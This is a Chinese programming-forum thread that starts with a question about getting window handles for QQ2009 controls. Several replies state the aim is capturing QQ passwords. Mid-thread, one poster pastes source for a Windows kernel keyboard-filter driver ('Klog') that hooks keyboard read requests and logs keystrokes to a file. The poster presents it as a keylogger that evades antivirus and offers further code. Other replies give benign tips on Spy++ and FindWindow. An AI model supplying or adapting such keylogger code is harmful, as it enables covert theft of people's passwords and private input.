急!!!怎么获取QQ2009的按钮句柄或者编辑框句柄???
解决方案 »
- xslt的小问题
- PictureBox里截图
- 怎样等浏览器加载完后才返回值
- 无.net的命令提示符时的服务与组件的注册问题
- C#写的c/s结构sqlserver数据库程序,发布的局域网其它机器运行时提示提不到Sql服务器,如何解决.
- 如何在.net中打印®和™这样的特殊字符????
- 请教:用OleDb访问Sql 2000数据库,要取得有访问权限的数据表的结构,字段类型为int的怎么取长度呢?
- 入门新人求救,有关DORPDOWNLIST的`(解决可加分)急~~~在线等~~~~~!!!
- 如何制作一个带进度条的页面
- datagrid控件的行高怎么固定?
- 请程序集达人帮忙解决这个棘手的问题
- 时间转换
是你要的吗
不知道对不对
我就可以捕获QQ的单击事件,获取USERANDPASS了!!!
所用控件全是画上去的 还有轻量级控件
全是没有句柄的!!!!!!!!!!!!
想截获密码 我给你段源码 但是就怕你不会用 呵呵
liap_MS_Spy_pp71这是微软的
spylite24
这两个配合使用,很不错
只要你装了VS的话应该就有这个东东的。
标题:张三
类名:TXGuiFoundation仅此而已,可见QQ2009的ui控件是自己画的,所以没有句柄,或者还有什么办法能够隐藏windows控件的句柄信息?..刚调试了个setWindowText,能通过TXGuiFoundation修改标题,但是其他按钮没法搞。。思路建议:
假如QQ聊天窗口的尺寸是固定的(我是win7+QQ2009sp4,获得的尺寸是540*492,这应该是默认大小),可以通过“反绘图”的思路,即模拟鼠标、坐标系统等定位按钮、文本框等。
下来的问题就是窗口尺寸,如果是自己用,肯定能知道尺寸的。如果是别人,可以在程序中定义几个常见尺寸,例如各个版本的默认大小、全屏时由桌面分辨率获得等等,具体的楼主自己测试吧。ps.如果你想做自动发送消息等等等等的东东,建议用其他的工具,按键精灵,autoit..
// Klog by Clandestiny
// Email: [email protected]
//@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@extern "C"
{
#include "ntddk.h"
}#include "ntddkbd.h"
#include "Klog.h"
#include "KbdHook.h"
#include "KbdLog.h"
#include "ScanCode.h"int numPendingIrps = 0;/////////////////////////////////////////////////////////////////////
// DriverEntry
//
// Routine Description:
// This is the first entry point called by the system when the
// driver is loaded.
//
// Parameters:
// DriverObject - pointer to the driver object
// RegistryPath - String used to find driver parameters in the
// registry. To locate Klog look for:
// HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Klog
//
// Return Value:
// NTSTATUS - Return STATUS_SUCCESS if no errors are encountered.
// Any other indicates to the system that an error has occured.
//
// Comments:
// Must call InitializeCppRunTime() to setup the C++ runtime environment.
////@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
extern "C" NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING RegistryPath )
{
NTSTATUS Status = {0};
DbgPrint("Keyboard Filter Driver - DriverEntry\nCompiled at " __TIME__ " on " __DATE__ "\n");
/////////////////////////////////////////////////////////////////////////////////////////
// Fill in IRP dispatch table in the DriverObject to handle I/O Request Packets (IRPs)
/////////////////////////////////////////////////////////////////////////////////////////
// For a filter driver, we want pass down ALL IRP_MJ_XX requests to the driver which
// we are hooking except for those we are interested in modifying.
for(int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
pDriverObject->MajorFunction[i] = DispatchPassDown;
DbgPrint("Filled dispatch table with generic pass down routine...\n"); //Explicitly fill in the IRP's we want to hook
pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead;
//Go ahead and hook the keyboard now
HookKeyboard(pDriverObject);
DbgPrint("Hooked IRP_MJ_READ routine...\n"); //Set up our worker thread to handle file writes of the scan codes extracted from the
//read IRPs
InitThreadKeyLogger(pDriverObject); //Initialize the linked list that will serve as a queue to hold the captured keyboard scan codes
PDEVICE_EXTENSION pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;
InitializeListHead(&pKeyboardDeviceExtension->QueueListHead); //Initialize the lock for the linked list queue
KeInitializeSpinLock(&pKeyboardDeviceExtension->lockQueue); //Initialize the work queue semaphore
KeInitializeSemaphore(&pKeyboardDeviceExtension->semQueue, 0 , MAXLONG); //Create the log file
IO_STATUS_BLOCK file_status;
OBJECT_ATTRIBUTES obj_attrib;
CCHAR ntNameFile[64] = "\\DosDevices\\c:\\klog.txt";
STRING ntNameString;
UNICODE_STRING uFileName;
RtlInitAnsiString( &ntNameString, ntNameFile);
RtlAnsiStringToUnicodeString(&uFileName, &ntNameString, TRUE );
InitializeObjectAttributes(&obj_attrib, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = ZwCreateFile(&pKeyboardDeviceExtension->hLogFile,GENERIC_WRITE,&obj_attrib,&file_status,
NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0);
RtlFreeUnicodeString(&uFileName); if (Status != STATUS_SUCCESS)
{
DbgPrint("Failed to create log file...\n");
DbgPrint("File Status = %x\n",file_status);
}
else
{
DbgPrint("Successfully created log file...\n");
DbgPrint("File Handle = %x\n",pKeyboardDeviceExtension->hLogFile);
} // Set the DriverUnload procedure
pDriverObject->DriverUnload = Unload;
DbgPrint("Set DriverUnload function pointer...\n");
DbgPrint("Exiting Driver Entry......\n");
return STATUS_SUCCESS;
}//@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
NTSTATUS DispatchPassDown(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp )
{
DbgPrint("Entering DispatchPassDown Routine...\n");
//pass the irp down to the target without touching it
IoSkipCurrentIrpStackLocation(pIrp);
return IoCallDriver(((PDEVICE_EXTENSION) pDeviceObject->DeviceExtension)->pKeyboardDevice ,pIrp);
}//end DriverDispatcher
//@@@@@@@@@@@@@@@@@@@@@@@@
// IRQL = passive level
//@@@@@@@@@@@@@@@@@@@@@@@@@
VOID Unload( IN PDRIVER_OBJECT pDriverObject)
{
//Get the pointer to the device extension
PDEVICE_EXTENSION pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pDriverObject->DeviceObject->DeviceExtension;
DbgPrint("Driver Unload Called...\n");
//Detach from the device underneath that we're hooked to
IoDetachDevice(pKeyboardDeviceExtension->pKeyboardDevice);
DbgPrint("Keyboard hook detached from device...\n"); ///////////////////////////////////////////////////////////////
//Wait for our tagged IRPs to die before we remove the device
///////////////////////////////////////////////////////////////
DbgPrint("There are %d tagged IRPs\n",numPendingIrps);
DbgPrint("Waiting for tagged IRPs to die...\n"); //Create a timer
KTIMER kTimer;
LARGE_INTEGER timeout;
timeout.QuadPart = 1000000; //.1 s
KeInitializeTimer(&kTimer);
while(numPendingIrps > 0)
{
//Set the timer
KeSetTimer(&kTimer,timeout,NULL);
KeWaitForSingleObject(&kTimer,Executive,KernelMode,false ,NULL);
}
//Set our key logger worker thread to terminate
pKeyboardDeviceExtension ->bThreadTerminate = true; //Wake up the thread if its blocked & WaitForXXX after this call
KeReleaseSemaphore(&pKeyboardDeviceExtension->semQueue,0,1,TRUE); //Wait till the worker thread terminates
DbgPrint("Waiting for key logger thread to terminate...\n");
KeWaitForSingleObject(pKeyboardDeviceExtension->pThreadObj,
Executive,KernelMode,false,NULL);
DbgPrint("Key logger thread termintated\n"); //Close the log file
ZwClose(pKeyboardDeviceExtension->hLogFile); //Delete the device
IoDeleteDevice(pDriverObject->DeviceObject);
DbgPrint("Tagged IRPs dead...Terminating...\n"); return;
}明眼人一眼就知道这是什么了 呵呵 你看懂了吗?? csdn有多少人能看懂呢? 我真想知道
这驱动挂的那么上层,一点用都没用。unload这样写卸载驱动的时候蓝屏就是家常便饭了,最后一个irp包居然这样处理
1.加载驱动
2.拦截irp
3.写入文件
就这样 详细的代码 你要吗? 我这有 你说个邮箱
不过 这段代码 没有第三步的代码 这个要你自己写 我是不会
其实 主要就是windows ring0层操作 不知道你研究过没有 这个方法最大的好处就是 杀软杀不出 截获成功率高
行看来还是很多高手啊~~~~~
FindWindow ("classname", "catpion")
和 FindWindowEx (hParent, NULL, "EDIT", NULL)
以及FindWindowEx (hParent, hNextChild, "EDIT", NULL)来获取你要的编辑框,
此处 "EDIT"只是实例而已,具体,你可以摸索,已经有这么多的关键词了